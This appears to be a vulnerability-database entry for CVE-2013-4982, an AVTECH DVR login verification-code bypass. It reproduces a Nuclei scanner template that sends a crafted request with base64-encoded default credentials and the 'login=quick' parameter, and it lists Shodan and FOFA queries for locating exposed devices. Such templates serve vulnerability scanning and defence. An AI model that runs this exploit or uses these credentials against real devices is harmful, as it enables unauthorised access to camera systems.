漏洞描述
AVTECH DVR products are vulnerable to verification code bypass just by entering the "login=quick" parameter to bypass verification code.
CVE-2013-4982: AVTECH DVR - Login Verification Code Bypass
PoC代码[已公开]
id: CVE-2013-4982
info:
name: AVTECH DVR - Login Verification Code Bypass
author: ritikchaddha
severity: low
description: |
AVTECH DVR products are vulnerable to verification code bypass just by entering the "login=quick" parameter to bypass verification code.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-4982
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5.0
cve-id: CVE-2013-4982
epss-score: 0.39617
epss-percentile: 0.97145
cwe-id: CWE-287
metadata:
verified: true
max-request: 1
shodan-query: title:"login" product:"Avtech"
fofa-query: app="AVTECH-视频监控"
tags: cve,cve2013,avtech,verify,bypass,iot,vuln
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/nobody/VerifyCode.cgi?account={{base64(username + ':' + password)}}&login=quick"
attack: pitchfork
payloads:
username:
- admin
password:
- linux321
matchers-condition: and
matchers:
- type: regex
regex:
- "^0.*\nOK.*"
- type: dsl
dsl:
- status_code == 200
- len(body) == 5
condition: and
# digest: 4b0a004830460221008257ddce1b9cf51af3dc7aa64dee3bff0059c0506ae8451b50c14ef2a4e85684022100acad26bc9b6deb6d59374b43812f074f6e0104dbb1c3e5f0f2adb5e6d74ed04e:922c64590222798bb761d5b6d8e72950